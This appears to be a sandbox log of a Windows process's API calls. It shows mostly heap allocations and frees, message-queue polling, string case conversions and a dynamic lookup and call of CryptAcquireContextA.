[0258.697] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1818 | out: hHeap=0x25c0000) returned 1 [0258.697] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa670 | out: hHeap=0x25c0000) returned 1 [0258.697] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6b8 | out: hHeap=0x25c0000) returned 1 [0258.697] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466d90 | out: hHeap=0x25c0000) returned 1 [0258.697] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0258.697] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0258.697] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0258.697] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0258.697] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6b8 [0258.697] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa670 [0258.697] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1838 [0258.697] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b48 [0258.697] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1818 [0258.697] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0258.697] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b48 | out: hHeap=0x25c0000) returned 1 [0258.697] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1818 | out: hHeap=0x25c0000) returned 1 [0258.698] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aaac0 [0258.698] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0258.698] PeekMessageW (in: lpMsg=0x8bf050, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf050) returned 0 [0258.698] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1818 [0258.698] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0258.698] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa910 [0258.698] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab68 [0258.698] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dc8 [0258.698] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa610 [0258.698] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dc8 | out: hHeap=0x25c0000) returned 1 [0258.698] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2dc8 [0258.698] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b48 [0258.698] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0258.698] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b48 | out: hHeap=0x25c0000) returned 1 [0258.698] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dc8 | out: hHeap=0x25c0000) returned 1 [0258.698] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa610 | out: hHeap=0x25c0000) returned 1 [0258.698] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab68 | out: hHeap=0x25c0000) returned 1 [0258.698] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa910 | out: hHeap=0x25c0000) returned 1 [0258.698] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0258.698] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1818 | out: hHeap=0x25c0000) returned 1 [0258.698] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7e0 [0258.699] PeekMessageW (in: lpMsg=0x8bf050, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf050) returned 0 [0258.699] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7e0 | out: hHeap=0x25c0000) returned 1 [0258.699] PeekMessageW (in: lpMsg=0x8bf050, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf050) returned 0 [0258.699] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1818 [0258.699] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0258.699] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa910 [0258.699] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab68 [0258.699] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dc8 [0258.699] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa610 [0258.699] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dc8 | out: hHeap=0x25c0000) returned 1 [0258.699] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa610 | out: hHeap=0x25c0000) returned 1 [0258.699] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab68 | out: hHeap=0x25c0000) returned 1 [0258.699] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa910 | out: hHeap=0x25c0000) returned 1 [0258.699] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0258.699] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1818 | out: hHeap=0x25c0000) returned 1 [0258.699] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0258.699] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaac0 | out: hHeap=0x25c0000) returned 1 [0258.699] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0258.699] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaac0 [0258.700] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1838 [0258.700] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa910 [0258.700] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0258.700] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab68 [0258.700] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1838 [0258.700] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa610 [0258.700] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0258.700] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0258.700] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6b8 | out: hHeap=0x25c0000) returned 1 [0258.700] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1818 | out: hHeap=0x25c0000) returned 1 [0258.700] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8c8 | out: hHeap=0x25c0000) returned 1 [0258.700] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3e8 | out: hHeap=0x25c0000) returned 1 [0258.700] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa538 | out: hHeap=0x25c0000) returned 1 [0258.700] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0258.700] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0258.701] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1818 | out: hHeap=0x25c0000) returned 1 [0258.701] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3b8 | out: hHeap=0x25c0000) returned 1 [0258.701] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4d8 | out: hHeap=0x25c0000) returned 1 [0258.701] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa430 | out: hHeap=0x25c0000) returned 1 [0258.701] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0258.701] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0258.701] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b48 | out: hHeap=0x25c0000) returned 1 [0258.701] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1818 | out: hHeap=0x25c0000) returned 1 [0258.701] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa598 | out: hHeap=0x25c0000) returned 1 [0258.701] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6a0 | out: hHeap=0x25c0000) returned 1 [0258.701] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa90 | out: hHeap=0x25c0000) returned 1 [0258.701] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0258.701] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0258.701] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0258.701] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0258.701] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0258.702] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0258.702] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa400 | out: hHeap=0x25c0000) returned 1 [0258.702] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1818 | out: hHeap=0x25c0000) returned 1 [0258.702] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa310 | out: hHeap=0x25c0000) returned 1 [0258.702] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0258.702] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa400 | out: hHeap=0x25c0000) returned 1 [0258.702] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1818 | out: hHeap=0x25c0000) returned 1 [0258.702] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa718 | out: hHeap=0x25c0000) returned 1 [0258.702] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dc8 | out: hHeap=0x25c0000) returned 1 [0258.702] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa718 | out: hHeap=0x25c0000) returned 1 [0258.702] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1818 | out: hHeap=0x25c0000) returned 1 [0258.702] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa400 | out: hHeap=0x25c0000) returned 1 [0258.702] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0258.702] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa400 | out: hHeap=0x25c0000) returned 1 [0258.702] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1818 | out: hHeap=0x25c0000) returned 1 [0258.702] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa718 | out: hHeap=0x25c0000) returned 1 [0258.702] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0258.703] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa718 | out: hHeap=0x25c0000) returned 1 [0258.703] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1818 | out: hHeap=0x25c0000) returned 1 [0258.703] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa400 | out: hHeap=0x25c0000) returned 1 [0258.703] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0258.703] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa310 | out: hHeap=0x25c0000) returned 1 [0258.703] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa310 | out: hHeap=0x25c0000) returned 1 [0258.703] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1818 | out: hHeap=0x25c0000) returned 1 [0258.703] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa400 | out: hHeap=0x25c0000) returned 1 [0258.703] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2658 | out: hHeap=0x25c0000) returned 1 [0258.703] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0258.703] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x2466d90, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0258.703] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa400 | out: hHeap=0x25c0000) returned 1 [0258.703] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466d90 | out: hHeap=0x25c0000) returned 1 [0258.704] GetProcAddress (hModule=0x74d40000, lpProcName="CryptAcquireContext") returned 0x0 [0258.704] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c68 | out: hHeap=0x25c0000) returned 1 [0258.704] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2658 | out: hHeap=0x25c0000) returned 1 [0258.704] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0258.704] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x2466d90, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0258.704] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa400 | out: hHeap=0x25c0000) returned 1 [0258.704] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466d90 | out: hHeap=0x25c0000) returned 1 [0258.704] GetProcAddress (hModule=0x74d40000, lpProcName="CryptAcquireContextA") returned 0x74d491dd [0258.704] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c68 | out: hHeap=0x25c0000) returned 1 [0258.704] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1818 | out: hHeap=0x25c0000) returned 1 [0258.704] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b39d0 | out: hHeap=0x25c0000) returned 1 [0258.704] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2658 | out: hHeap=0x25c0000) returned 1 [0258.704] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2658 | out: hHeap=0x25c0000) returned 1 [0258.704] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1818 | out: hHeap=0x25c0000) returned 1 [0258.705] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1948 | out: hHeap=0x25c0000) returned 1 [0258.705] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0258.705] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0258.705] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466d90 | out: hHeap=0x25c0000) returned 1 [0258.705] CryptAcquireContextA (in: phProv=0x8befe0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x8befe0*=0xad2940) returned 1 [0258.706] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa718 | out: hHeap=0x25c0000) returned 1 [0258.706] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0258.706] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa310 | out: hHeap=0x25c0000) returned 1 [0258.706] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa328 | out: hHeap=0x25c0000) returned 1 [0258.706] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0258.706] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa718 | out: hHeap=0x25c0000) returned 1 [0258.706] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2f8 | out: hHeap=0x25c0000) returned 1 [0258.706] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0258.706] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa328 | out: hHeap=0x25c0000) returned 1 [0258.706] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7c0 | out: hHeap=0x25c0000) returned 1 [0258.706] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0258.706] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2f8 | out: hHeap=0x25c0000) returned 1 [0258.706] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6e8 | out: hHeap=0x25c0000) returned 1 [0258.706] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0258.707] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7c0 | out: hHeap=0x25c0000) returned 1 [0258.707] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa730 | out: hHeap=0x25c0000) returned 1 [0258.707] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0258.707] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6e8 | out: hHeap=0x25c0000) returned 1 [0258.707] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0258.707] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dc8 | out: hHeap=0x25c0000) returned 1 [0258.707] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0258.707] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0258.707] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0258.707] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b48 | out: hHeap=0x25c0000) returned 1 [0258.707] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa478 | out: hHeap=0x25c0000) returned 1 [0258.707] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0258.707] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa670 | out: hHeap=0x25c0000) returned 1 [0258.707] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0258.707] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0258.707] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0258.707] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1838 [0258.707] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e10 [0258.708] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1858 [0258.708] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa388 [0258.708] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa748 [0258.708] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1908 [0258.708] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa48 [0258.708] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0258.708] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b48 [0258.708] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2d28 [0258.708] CharUpperBuffW (in: lpsz="A1300D00639", cchLength=0xb | out: lpsz="A1300D00639") returned 0xb [0258.708] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0258.708] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1838 [0258.708] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1858 [0258.708] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa598 [0258.708] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa90 [0258.708] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1908 [0258.708] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6a0 [0258.708] CharUpperBuffW (in: lpsz="SSA1300D00639", cchLength=0xd | out: lpsz="SSA1300D00639") returned 0xd [0258.708] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0258.708] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0258.709] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1838 [0258.709] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa598 [0258.709] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa90 [0258.709] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1858 [0258.709] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6a0 [0258.709] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0258.709] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0258.709] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0258.709] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0258.709] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b48 [0258.709] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2d28 [0258.709] CharUpperBuffW (in: lpsz="A610080612A", cchLength=0xb | out: lpsz="A610080612A") returned 0xb [0258.709] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0258.709] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0258.709] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0258.709] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa48 [0258.709] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa388 [0258.709] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1838 [0258.709] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa940 [0258.709] CharUpperBuffW (in: lpsz="SSA610080612A", cchLength=0xd | out: lpsz="SSA610080612A") returned 0xd [0258.709] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0258.710] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0258.710] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0258.710] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa48 [0258.710] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa388 [0258.710] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0258.710] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa940 [0258.710] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0258.710] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0258.710] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0258.710] 